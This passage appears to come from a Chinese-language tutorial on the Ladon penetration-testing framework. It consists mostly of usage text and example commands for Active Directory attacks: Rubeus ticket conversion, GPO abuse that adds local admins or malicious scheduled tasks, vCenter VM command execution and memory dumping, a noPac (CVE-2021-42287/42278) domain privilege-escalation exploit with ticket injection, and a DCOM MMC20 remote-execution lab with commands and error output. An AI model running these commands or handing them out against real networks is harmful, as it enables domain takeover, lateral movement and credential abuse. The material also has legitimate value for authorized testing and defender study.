211.     The "/debug" flag outputs ASN.1 debugging information.
     
212. 
     
213.     Convert an AS-REP and a key to a Kirbi:
     
214.         Ladon.exe Rubeus asrep2kirbi /asrep:<BASE64 | FILEPATH> </key:BASE64 | /keyhex:HEXSTRING> [/enctype:DES|RC4|AES128|AES256] [/ptt] [/luid:X] [/nowrap]
     
215. 
     
216. 
     
217. NOTE: Base64 ticket blobs can be decoded with :
     
218. 
     
219.     [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa..."))
     
220. 
     

复制代码

0x005 域渗透 SharpGPOAbuse 组策略(GPO)横向移动

Ladon SharpGPOAbuse

1. Usage:
   
2.   Ladon.exe SharpGPOAbuse <AttackType> <AttackOptions>
   
3. 
   
4. Attack Types:
   
5. --AddUserRights
   
6.   Add rights to a user account
   
7. --AddLocalAdmin
   
8.   Add a new local admin. This will replace any existing local admins!
   
9. --AddComputerScript
   
10.   Add a new computer startup script
    
11. --AddUserScript
    
12.   Add a new user startup script
    
13. --AddComputerTask
    
14.   Add a new computer immediate task
    
15. --AddUserTask
    
16.   Add a new user immediate task
    
17. 
    
18. 
    
19. Options required to add a new local admin:
    
20. --UserAccount
    
21.   Set the name of the account to be added in local admins.
    
22. --GPOName
    
23.   The name of the vulnerable GPO.
    
24. 
    
25. 
    
26. Options required to add a new user startup script:
    
27. --ScriptName
    
28.   Set the name of the new startup script.
    
29. --ScriptContents
    
30.   Set the contents of the new startup script.
    
31. --GPOName
    
32.   The name of the vulnerable GPO.
    
33. 
    
34. 
    
35. Options required to add a new computer startup script:
    
36. --ScriptName
    
37.   Set the name of the new startup script.
    
38. --ScriptContents
    
39.   Set the contents of the new startup script.
    
40. --GPOName
    
41.   The name of the vulnerable GPO.
    
42. 
    
43. 
    
44. Options required to add new user rights:
    
45. --UserRights
    
46.   Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
    
47. --UserAccount
    
48.   Set the account to add the new rights.
    
49. --GPOName
    
50.   The name of the vulnerable GPO.
    
51. 
    
52. 
    
53. Options required to add a new computer immediate task:
    
54. --TaskName
    
55.   Set the name of the new computer task.
    
56. --Author
    
57.   Set the author of the new task (use a DA account).
    
58. --Command
    
59.   Command to execute.
    
60. --Arguments
    
61.   Arguments passed to the command.
    
62. --GPOName
    
63.   The name of the vulnerable GPO.
    
64. Additional Options:
    
65. --FilterEnabled
    
66.   Enable Target Filtering for computer immediate tasks.
    
67. --TargetDnsName
    
68.   The DNS name of the computer to target. The malicious task will run only on the specified host.
    
69. 
    
70. 
    
71. Options required to add a new user immediate task:
    
72. --TaskName
    
73.   Set the name of the user new task.
    
74. --Author
    
75.   Set the author of the new task (use a DA account).
    
76. --Command
    
77.   Command to execute.
    
78. --Arguments
    
79.   Arguments passed to the command.
    
80. --GPOName
    
81.   The name of the vulnerable GPO.
    
82. Additional Options:
    
83. --FilterEnabled
    
84.   Enable Target Filtering for user immediate tasks.
    
85. --TargetUsername
    
86.   The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
    
87. --TargetUserSID
    
88.   The targeted user's SID.
    
89. 
    
90. 
    
91. Other options:
    
92. --DomainController
    
93.   Set the target domain controller.
    
94. --Domain
    
95.   Set the target domain.
    
96. --Force
    
97.   Overwrite existing files if required.

复制代码

0x006  域渗透SharpGPO

Ladon SharpGPO

1. Load SharpGPO
   
2. 
   
3. Usage:
   
4.     Ladon SharpGPO --Action <Action> <Options>
   
5. 
   
6.     Actions:
   
7.         --Action
   
8.             GetOU                     List all OUs.
   
9.             NewOU                     Create an new OU.
   
10.             RemoveOU                  Remove an OU.
    
11.             MoveObject                Move an AD Object to an OU / Remove an AD Object from an OU.
    
12.             GetGPO                    List all names and GUIDs of GPOs.
    
13.             NewGPO                    Create a new GPO.
    
14.             RemoveGPO                 Delete a GPO.
    
15.             GetGPLink                 List all gPLinks of domain, ou and sites.
    
16.             NewGPLink                 Create a new GpLink.
    
17.             RemoveGPLink              Delete a GpLink from OU.
    
18.             GetSecurityFiltering      List security filterings of the target GPO.
    
19.             NewSecurityFiltering      Create a new security filtering.
    
20.             RemoveSecurityFiltering   Delete a security filtering from GPO.
    
21. 
    
22.     Options:
    
23.         --DomainController            Set ip/hostname of the domain controller.
    
24.         --Domain                      Set the target domain FQDN (e.g test.com).
    
25.         --OUName                      Set an OU name.
    
26.         --GPOName                     Set a GPO name.
    
27.         --GUID                        Set the GUID of the GPO.
    
28.         --DN                          Distinguished name of the target OU, domain or sites (e.g CN=IT Support,DC=testad,DC=com).
    
29.         --SrcDN                       Distinguished name of an AD Object, used by MoveObject.
    
30.         --DstDN                       Distinguished name of an AD Object, used by MoveObject.
    
31.         --BaseDN                      Distinguished name of an AD Object, used by NewOU.
    
32.         --DomainGroup                 Domain group name.
    
33.         --DomainUser                  Domain user name.
    
34.         --DomainComputer              Domain computer name.
    
35.         --NTAccount                   NtAccount name.
    
36.         -h/--Help                     Display help menu.
    
37. 
    
38.     Examples:
    
39.         Ladon SharpGPO -h
    
40. 
    
41.         # OU Operations
    
42.         Ladon SharpGPO --Action GetOU
    
43.         Ladon SharpGPO --Action GetOU --OUName "IT Support"
    
44. 
    
45.         Ladon SharpGPO --Action NewOU --OUName "IT Support"
    
46.         Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"
    
47. 
    
48.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
    
49.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"
    
50. 
    
51.         Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
    
52.         Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"
    
53. 
    
54.         # GPO Operations
    
55.         Ladon SharpGPO --Action GetGPO
    
56.         Ladon SharpGPO --Action GetGPO --GPOName testgpo
    
57. 
    
58.         Ladon SharpGPO --Action NewGPO --GPOName testgpo
    
59. 
    
60.         Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
    
61.         Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
62. 
    
63.         Ladon SharpGPO --Action GetGPLink
    
64.         Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
    
65.         Ladon SharpGPO --Action GetGPLink --GPOName testgpo
    
66.         Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
67. 
    
68.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
    
69.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
70. 
    
71.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
    
72.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
73. 
    
74.         Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
    
75.         Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
76. 
    
77.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
    
78.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
    
79.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
    
80.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
    
81.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
    
82.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
    
83.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
    
84.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
    
85. 
    
86.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
    
87.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
    
88.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
    
89.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
    
90.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
    
91.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
    
92.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
    
93.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
    

复制代码

0x007 SharpSphere vCenter管理虚拟机交互执行命令工具

Ladon SharpSphere

1. C:\Users\k8gege>Ladon SharpSphere
   
2. 11.6.0.0
   
3. Copyright ?  2023
   
4. 
   
5. ERROR(S):
   
6.   No verb selected.
   
7. 
   
8.   dump        Snapshot and download memory dump file
   
9. 
   
10.   list        List all VMs managed by this vCenter
    
11. 
    
12.   execute     Execute given command in target VM
    
13. 
    
14.   c2          Run C2 using C3's VMwareShareFile module
    
15. 
    
16.   upload      Upload file to target VM
    
17. 
    
18.   download    Download file from target VM
    
19. 
    
20.   help        Display more information on a specific command.
    
21. 
    
22.   version     Display version information.

复制代码

0x008 域渗透 域内提权CVE-2021-42287/CVE-2021-42278

Ladon noPac

1. CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter
   
2. 
   
3. /domain /user /pass argument needed for scanning
   
4. /dc /mAccount /nPassword argument needed for exploitation
   
5. 
   
6. Examples:
   
7.   Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
   
8.   Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
   
9.   Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
   
10.   Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt

复制代码

0x009 Wiki文档搜索模块

例子：在update.txt里搜索 横向移动 都有哪些模块或功能可用，也可以在Github上的Ladon简明使用教程，查看命令用法

0x010 Dcom远程执行实验

攻击机: Win7、Win8、Win10或任意机器   IP: 192.168.9.8

服务器: Win2012或其它win操作系统，关闭防火墙 IP: 192.168.9.11

两台机器使用相同用户密码登陆，被攻击机登陆用户为管理员

攻击机打开的cmd可以是非管理员权限，指定IP即可在服务器执行命令

命令无回显，可通过重定向输出TXT查看命令执行结果

1. Ladon MmcExec 192.168.9.11 "whoami > c:\1.txt"

复制代码

Dcom没有具体端口(所以关闭防火墙实验)

对于 MMC20.Application 这个 COM 组件，它本身并没有固定的端口号。MMC（Microsoft Management Console）是一个管理控制台框架，它允许你加载各种管理插件（Snap-in），每个插件都可以提供不同的功能和使用不同的端口。

具体的端口号取决于所加载的插件或扩展程序。例如，如果你使用 MMC20.Application 加载了远程桌面（Remote Desktop）插件，那么远程桌面会使用默认的端口号3389。如果你使用 MMC20.Application 加载了 IIS（Internet Information Services）插件，那么 IIS 可能会使用默认的端口号80（HTTP）或443（HTTPS）。

因此，要确定具体的端口号，需要查看你加载的具体插件的配置信息或文档。不同的插件可能使用不同的端口号进行通信。

注: 系统用户密码不一致无法横向执行 单纯修改密码不行 一定要重启登陆

当然也可以在IPC连接或Mimikatz注入hash后的CMD上执行

2012开启防火墙 同用户密码Win7报错   

1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLS
   
2. ID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件检索 COM 类工厂失败，原
   
3. 因是出现以下错误: 800706ba。”

复制代码

2012关闭防火墙 Win7


网络不通报错

1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLSID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F
   
2. 889} 的远程组件检索 COM 类工厂失败，原因是出现以下错误: 800706ba。”
   
3. 所在位置 行:1 字符: 28
   
4. + [activator]::CreateInstance <<<< ([type]::GetTypeFromProgID("MMC20.Application","192.168.50.18")).Document.ActiveView
   
5. .ExecuteShellCommand('cmd.exe',$null,"/c whoami > c:\users\public\test.txt","Minimzed")
   
6.     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
   
7.     + FullyQualifiedErrorId : DotNetMethodException

复制代码

不同用户同密码、同用户不同密码 报错

1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLS
   
2. ID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件检索 COM 类工厂失败，原
   
3. 因是出现以下错误: 80070005。”
   
4. 所在位置 行:1 字符: 28

复制代码

Win8同用户 密码不一致

1. Exception calling "CreateInstance" with "1" argument(s): "Retrieving the COM
   
2. class factory for remote component with CLSID
   
3. {49B2791A-B1AE-4C90-9B8E-E860BA07F889} from machine 192.168.50.18 failed due
   
4. to the following error: 80070005 192.168.50.18."

复制代码